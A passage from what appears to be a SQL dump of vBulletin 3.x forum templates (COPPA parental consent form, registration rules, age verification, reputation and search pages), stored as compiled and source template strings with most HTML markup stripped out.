    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1232366235, 'vBulletin Solutions', '3.8.1', 'vbulletin'), (1540, -1, 'register_coppaform', '$stylevar[htmldoctype]\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[parental_permission_required]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\\\">\" . construct_phrase(\"$vbphrase[permission_to_participate_at_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
    \r\n\r\n\r\n

    \r\n \" . construct_phrase(\"$vbphrase[instructions_for_parent_guardian]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'companyname\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'faxnumber\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'address\'] . \"\") . \"\r\n

    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[required_information]
    $vbphrase[username]\" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \" 
    $vbphrase[email_address]\" . $GLOBALS[\'vbulletin\']->userinfo[\'email\'] . \" 
    $vbphrase[optional_information]
    \r\n $vbphrase[make_changes_profile_visit]:
    \r\n options[\'bburl\'] . \"/profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=editprofile\\\">\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/profile.php?do=editprofile\r\n
    $vbphrase[home_page]\" . $GLOBALS[\'vbulletin\']->userinfo[\'homepage\'] . \" 
    $vbphrase[signature]\" . $GLOBALS[\'vbulletin\']->userinfo[\'signature\'] . \" 
    \r\n $vbphrase[privacy_mode]\r\n
    $vbphrase[yes_hides_email_icq_etc]
    \r\n
    \" . $GLOBALS[\'vbulletin\']->userinfo[\'showemail\'] . \" 
    $vbphrase[icq_number]\" . $GLOBALS[\'vbulletin\']->userinfo[\'icq\'] . \" 
    $vbphrase[aim_screen_name]\" . $GLOBALS[\'vbulletin\']->userinfo[\'aim\'] . \" 
    $vbphrase[yahoo_messenger_handle]\" . $GLOBALS[\'vbulletin\']->userinfo[\'yahoo\'] . \" 
    $vbphrase[msn_messenger_handle]\" . $GLOBALS[\'vbulletin\']->userinfo[\'msn\'] . \" 
    $vbphrase[skype_name]\" . $GLOBALS[\'vbulletin\']->userinfo[\'skype\'] . \" 
    \r\n \".(($GLOBALS[\'vbulletin\']->options[\'privacyurl\']) ? (\"\" . construct_phrase(\"$vbphrase[sign_form_and_send_with_privacy]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'privacyurl\'] . \"\") . \"\") : (\"$vbphrase[sign_form_and_send_without_privacy]\")).\"\r\n
    $vbphrase[parent_guardian_full_name] 
    $vbphrase[relation_to_child] 
    $vbphrase[telephone_number] 
    $vbphrase[email_address]\" . $GLOBALS[\'vbulletin\']->userinfo[\'parentemail\'] . \" 
    $vbphrase[parent_signature] 
    $vbphrase[date] 
    \" . construct_phrase(\"$vbphrase[contact_webmaster_questions]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'contactuslink\'] . \"\") . \"
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[parental_permission_required]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[permission_to_participate_at_x]
    \r\n\r\n\r\n

    \r\n $vbphrase[instructions_for_parent_guardian]\r\n

    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[required_information]
    $vbphrase[username]$bbuserinfo[username] 
    $vbphrase[email_address]$bbuserinfo[email] 
    $vbphrase[optional_information]
    \r\n $vbphrase[make_changes_profile_visit]:
    \r\n $vboptions[bburl]/profile.php?do=editprofile\r\n
    $vbphrase[home_page]$bbuserinfo[homepage] 
    $vbphrase[signature]$bbuserinfo[signature] 
    \r\n $vbphrase[privacy_mode]\r\n
    $vbphrase[yes_hides_email_icq_etc]
    \r\n
    $bbuserinfo[showemail] 
    $vbphrase[icq_number]$bbuserinfo[icq] 
    $vbphrase[aim_screen_name]$bbuserinfo[aim] 
    $vbphrase[yahoo_messenger_handle]$bbuserinfo[yahoo] 
    $vbphrase[msn_messenger_handle]$bbuserinfo[msn] 
    $vbphrase[skype_name]$bbuserinfo[skype] 
    \r\n $vbphrase[sign_form_and_send_with_privacy]$vbphrase[sign_form_and_send_without_privacy]\r\n
    $vbphrase[parent_guardian_full_name] 
    $vbphrase[relation_to_child] 
    $vbphrase[telephone_number] 
    $vbphrase[email_address]$bbuserinfo[parentemail] 
    $vbphrase[parent_signature] 
    $vbphrase[date] 
    $vbphrase[contact_webmaster_questions]
    \r\n\r\n\r\n', 'template', 1198801103, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1541, -1, 'register_rules', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'coppa\']) ? (\"$vbphrase[coppa_rules]\") : (\"$vbphrase[forum_rules]\")).\"\r\n\r\n\r\n$header\r\n\r\n
    \r\n
    \r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'coppa\']) ? (\"\r\n\r\n\") : (\"\r\n\r\n\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \" . construct_phrase(\"$vbphrase[x_rules]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[forum_rules]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_proceed_must_agree]
    \r\n
    \r\n\r\n \".(($show[\'coppa\']) ? (\"\r\n \r\n

    $vbphrase[coppa_policy]

    \r\n\r\n \" . construct_phrase(\"$vbphrase[coppa_rules_description]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=coppaform\", \"\" . $GLOBALS[\'vbulletin\']->options[\'webmasteremail\'] . \"\") . \"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[forum_rules_registration]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \" . construct_phrase(\"$vbphrase[forum_rules_description]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - <if condition=\"$show[\'coppa\']\">$vbphrase[coppa_rules]<else />$vbphrase[forum_rules]</if>\r\n\r\n\r\n$header\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[x_rules]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[forum_rules]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[to_proceed_must_agree]
    \r\n
    height:175px; overflow:auto\">\r\n\r\n \r\n \r\n

    $vbphrase[coppa_policy]

    \r\n\r\n $vbphrase[coppa_rules_description]\r\n \r\n
    \r\n\r\n \r\n $vbphrase[forum_rules_registration]\r\n $vbphrase[forum_rules_description]\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1220350057, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1542, -1, 'register_verify_age', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[register]\r\n\r\n\r\n\r\n$header\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \" . construct_phrase(\"$vbphrase[register_at_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[please_enter_your_date_of_birth]\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[month]:
    \r\n \r\n
    \r\n $vbphrase[day]:
    \r\n \r\n
    \r\n $vbphrase[year]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[register]\r\n\r\n\r\n\r\n$header\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[register_at_x]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[please_enter_your_date_of_birth]\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[month]:
    \r\n \r\n
    \r\n $vbphrase[day]:
    \r\n \r\n
    \r\n $vbphrase[year]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876529, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1543, -1, 'reputation', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[reputation]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n \r\n\r\n$reputationbit\r\n
    $vbphrase[reputation]
    \r\n
    \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[reputation]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n \r\n\r\n$reputationbit\r\n
    $vbphrase[reputation]
    \r\n
    \r\n\r\n$footer\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1544, -1, 'reputationbit', '\r\n $vbphrase[add_to_reputation]: $userinfo[username]\r\n\r\n\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[what_do_you_think_of_xs_post]\", \"$userinfo[username]\") . \"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \".(($show[\'negativerep\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n $vbphrase[your_comments_on_this_post]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n \r\n', '\r\n $vbphrase[add_to_reputation]: $userinfo[username]\r\n\r\n\r\n \r\n
    \r\n
    style=\"width:$stylevar[formwidth]\" align=\"$stylevar[left]\">\r\n\r\n
    \r\n $vbphrase[what_do_you_think_of_xs_post]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[your_comments_on_this_post]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n', 'template', 1208960545, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1545, -1, 'reputation_ajax', '\r\n\r\n \r\n\r\n$reputationbit\r\n
    $vbphrase[reputation]
    ', '\r\n\r\n \r\n\r\n$reputationbit\r\n
    $vbphrase[reputation]
    ', 'template', 1265387840, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1546, -1, 'reputation_reasonbits', '\r\n \\\"\\\"\r\n $reason\r\n\r\n', '\r\n \"\"\r\n $reason\r\n\r\n', 'template', 1069256457, 'vBulletin Solutions', '', 'vbulletin'), (1547, -1, 'reputation_yourpost', '\r\n \" . construct_phrase(\"$vbphrase[reputation_on_post_is_x]\", \"showthread.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$postid#post$postid\", \"$reputation\") . \"\r\n\r\n\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[comments_on_this_post]\r\n \r\n $reputation_reasonbits\r\n
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[you_have_x_reputation_points]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'reputation\'] . \"\") . \"
    \r\n\r\n
    \r\n
    \r\n \r\n', '\r\n $vbphrase[reputation_on_post_is_x]\r\n\r\n\r\n \r\n
    \r\n
    style=\"width:$stylevar[formwidth]\" align=\"$stylevar[left]\">\r\n\r\n
    \r\n $vbphrase[comments_on_this_post]\r\n \r\n $reputation_reasonbits\r\n
    \r\n
    \r\n\r\n
    $vbphrase[you_have_x_reputation_points]
    \r\n\r\n
    \r\n
    \r\n \r\n', 'template', 1147900455, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1548, -1, 'search_forums', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'searchthread\']) ? (\"$vbphrase[search_thread]\") : (\"$vbphrase[search_forums]\")).\"\r\n$tag_cloud_headinclude\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[errors_occured_with_search]:\r\n
    \r\n
      $errorlist
    \r\n
    \r\n\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'searchthread\']) ? (\"$vbphrase[search_thread] - session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\") : (\"$vbphrase[search_forums]\")).\"\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \".(($human_verify) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n $vbphrase[search_by_key_word]\r\n \r\n \r\n \r\n \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    $vbphrase[key_words]:
    \r\n
    \r\n
    \r\n \".(($show[\'nocache\']) ? (\" \") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[search_by_user_name]\r\n \r\n \r\n \r\n \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    $vbphrase[username]:
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'searchthread\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    $human_verify
    \r\n\r\n
    \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[search_options]\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \".(($prefix_options) ? (\"\r\n
    \r\n $vbphrase[find_threads_with_prefix]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[find_threads_with]\r\n
    \r\n \r\n $vbphrase[replies]\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[find_posts_from]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \".((!$show[\'searchthread\']) ? (\"\r\n
    \r\n $vbphrase[sort_results_by]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[show_results_as]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n \".(($show[\'tag_option\']) ? (\"\r\n
    \r\n $vbphrase[search_by_tag]\r\n
    \r\n
    $vbphrase[tag]:
    \r\n
    \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[search_in_forums]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \".(($show[\'cantsearchposts\']) ? (\"$vbphrase[you_can_only_search_thread_titles]\") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n session->vars[\'sessionurl\'] . \"type=advanced\';\\\" />\r\n
    \r\n
    \r\n\r\n\".(($show[\'member\']) ? (\"\r\n
    \r\n \r\n \r\n options[\'cleargifurl\'] . \"\\\" style=\\\"width: 1px; height: 1px;\\\" />\r\n \r\n \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($tag_cloud) ? (\"\r\n
    $tag_cloud
    \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - <if condition=\"$show[\'searchthread\']\">$vbphrase[search_thread]<else />$vbphrase[search_forums]</if>\r\n$tag_cloud_headinclude\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[errors_occured_with_search]:\r\n
    \r\n
      $errorlist
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[search_thread] - $threadinfo[title]$vbphrase[search_forums]\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n $vbphrase[search_by_key_word]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[key_words]:
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[search_by_user_name]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[username]:
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    $human_verify
    \r\n\r\n
    \r\n\r\n
    \r\n \"\"\r\n $vbphrase[search_options]\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n
    \r\n $vbphrase[find_threads_with_prefix]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[find_threads_with]\r\n
    \r\n \r\n $vbphrase[replies]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[find_posts_from]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[sort_results_by]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[show_results_as]\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[search_by_tag]\r\n
    \r\n
    $vbphrase[tag]:
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[search_in_forums]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n $vbphrase[you_can_only_search_thread_titles]\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    $tag_cloud
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1213274609, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1549, -1, 'search_results', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[search_results]\r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[search_results_top]\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($displayCommon) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($search[\'showposts\']) ? (\"\r\n\r\n
    \r\n\r\n \".(($show[\'inlinemod\'] AND $search[\'showposts\']) ? (\"\") : (\"\")).\"\r\n \r\n \".(($show[\'results\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$numitems\") . \"\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'generated\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[search_took_x_seconds_gen_y_mins]\", \"$searchtime\", \"$searchminutes\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[search_took_x_seconds]\", \"$searchtime\") . \"\r\n \")).\"\r\n
    \r\n\r\n session->vars[\'sessionurl\'] . \"$searchquery\\\">$vbphrase[search]:\r\n \r\n \".(($action == \'process\') ? (\"\r\n \".(($displayWords) ? (\"$vbphrase[key_words]: $displayWords\") : (\"\")).\"\r\n\r\n \".(($displayUsers) ? (\"\r\n \".(($displayWords) ? (\"; \") : (\"\")).\"\r\n \".(($starteronly) ? (\"$vbphrase[threads_started_by]\") : (\"$vbphrase[posts_made_by]\")).\": $displayUsers\r\n \") : (\"\")).\"\r\n\r\n \".(($display_tag) ? (\"\r\n \".(($displayWords OR $displayUsers) ? (\"; \") : (\"\")).\"\r\n $vbphrase[tag]: $display_tag\r\n \") : (\"\")).\"\r\n\r\n \".(($display_prefixes) ? (\"\r\n \".(($displayWords OR $displayUsers OR $display_tag) ? (\"; \") : (\"\")).\"\r\n $vbphrase[prefix]: $display_prefixes \".(($show[\'no_prefix\']) ? (\"$vbphrase[or_no_prefix]\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n \") : (\"\".(($action == \'getnew\') ? (\"\r\n $vbphrase[new_posts_nav]\r\n \") : (\"\".(($action == \'getdaily\') ? (\"\r\n $vbphrase[posts_from_last_day]\r\n \") : (\"\")).\"\")).\"\")).\"\r\n\r\n \".(($displayForums) ? (\"\r\n ; $vbphrase[forum]: $displayForums \".(($childforums) ? (\"$vbphrase[and_child_forums]\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n \".(($show[\'titleonlysearch\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[thread_titles_only_search]\", \"$titlesearchurl\") . \"\r\n \") : (\"\")).\"\r\n
    \r\n
    $vbphrase[words_very_common]: $displayCommon
    \r\n\r\n$searchbits\r\n\r\n\r\n\r\n\") : (\"\r\n$announcebits\r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n\r\n\r\n \") : (\"\")).\"\r\n\r\n\r\n\r\n\".((!$show[\'results\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\r\n$searchbits\r\n\")).\"\r\n\r\n\")).\"\r\n\r\n\r\n \r\n\r\n
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]$vbphrase[forum] \r\n \r\n
    \r\n
    \r\n $vbphrase[no_unread_threads]\r\n
    \r\n
    \r\n \".(($show[\'results\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$numitems\") . \"\r\n \") : (\"\r\n  \r\n \")).\"\r\n
    \r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"\") : (\"\")).\"\r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'ajax_js\'] AND $show[\'results\'] AND !$search[\'showposts\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n $vbphrase[moderation]
    \r\n \".((!$search[\'showposts\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n
    \r\n\r\n$template_hook[search_results_bottom]\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[search_results]\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[search_results_top]\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n
    \r\n\r\n \r\n \r\n \r\n $vbphrase[showing_results_x_to_y_of_z]\r\n
    \r\n
    \r\n \r\n $vbphrase[search_took_x_seconds_gen_y_mins]\r\n \r\n $vbphrase[search_took_x_seconds]\r\n \r\n
